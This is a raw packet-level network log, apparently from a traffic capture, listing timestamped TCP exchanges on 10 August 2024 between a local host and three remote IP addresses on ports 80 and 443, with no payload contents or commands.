Aug 10, 2024 16:12:23.863495111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863511086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863533974 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863840103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863850117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863858938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863867998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863878012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863887072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863897085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863905907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863915920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863922119 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863929987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863946915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863951921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863964081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863969088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863981009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863986969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863998890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864002943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864015102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864020109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864032984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864051104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864070892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864093065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864103079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864110947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864123106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864135027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864142895 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864151955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864164114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864177942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864187002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864204884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864209890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864237070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864253998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864263058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864272118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864283085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864290953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864300966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864311934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864320040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864326954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864341974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864348888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864367008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864373922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864382029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864394903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864413023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864439011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864444971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864454985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864465952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864475965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864495993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864501953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864517927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864546061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864573002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864582062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864598036 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864609003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864614964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864624023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864634037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864645004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864653111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864677906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.864797115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864805937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.864840031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.886676073 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.886707067 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.886758089 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.886811018 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.886843920 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.886928082 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.888878107 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.888900995 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.888953924 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.888972998 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.888995886 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.889134884 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.891130924 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.891155958 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.891207933 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.891223907 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.891248941 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.891271114 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.894208908 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.894231081 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.894283056 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.894294977 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.894320011 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.894339085 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.894818068 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.894838095 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.894881964 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.894893885 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.894918919 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.894969940 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.895226002 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.895246029 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.895281076 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.895294905 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.895322084 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.895339966 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.908638954 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.908660889 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.908757925 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.908757925 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.908761978 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.908853054 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.912667036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.912678957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.912688017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.912698030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.912708044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.912718058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.912727118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.912739992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.912758112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.912776947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.940438986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940449953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940459013 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940499067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.940547943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.940805912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940823078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940833092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940843105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940854073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940865993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940879107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940885067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.940890074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940906048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940911055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.940911055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.940915108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940926075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940934896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.940936089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940947056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940968990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.940978050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.940990925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941018105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941087961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941101074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941119909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941138029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941143036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941143036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941148996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941159010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941169024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941180944 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941194057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941200018 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941200018 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941200018 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941200018 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941204071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941214085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941224098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941225052 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941234112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941245079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941255093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941265106 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941272020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941272020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941273928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941287041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941315889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941315889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941344976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941847086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941858053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941867113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941876888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941886902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941898108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941907883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941916943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941927910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941937923 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941947937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941947937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941947937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941950083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941961050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.941966057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941977024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.941987991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942008018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942008972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942018032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942030907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942030907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942049026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942051888 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942061901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942074060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942082882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942094088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942105055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942114115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942123890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942133904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942147017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942150116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942150116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942150116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942150116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942157984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942167997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942178011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942188025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942197084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942197084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942198992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942255020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942255020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942431927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942442894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942451954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942461014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942471027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942481041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942511082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942538023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942548037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942555904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942567110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942576885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942586899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942596912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942605019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942605019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942605019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942605972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942615986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942625999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942636967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.942678928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942678928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942678928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.942678928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943126917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943136930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943145037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943156004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943166971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943180084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943191051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943201065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943217039 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943217039 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943218946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943229914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943238974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943248034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943258047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943268061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943275928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943275928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943278074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943289042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943295002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943295002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943300009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943309069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943317890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943329096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943340063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943350077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943350077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943351030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943361044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943361998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943372011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943381071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943391085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943397999 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943402052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.943521976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.943521976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.944324017 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.944338083 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.944413900 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.944418907 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.944650888 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.944957018 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.944969893 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.945031881 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.945039034 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.945496082 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.945513964 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.945564985 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.945569992 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.945614100 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.945614100 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.945858955 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.945871115 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.945930004 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.945935011 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.945987940 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.946358919 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.946377993 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.946429014 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.946432114 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.946446896 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.946492910 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.947736979 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.947751045 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.947855949 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.947860003 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.948021889 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.948695898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948708057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948718071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948729992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948740959 CEST	80	49739	147.45.44.104	192.168.2.4
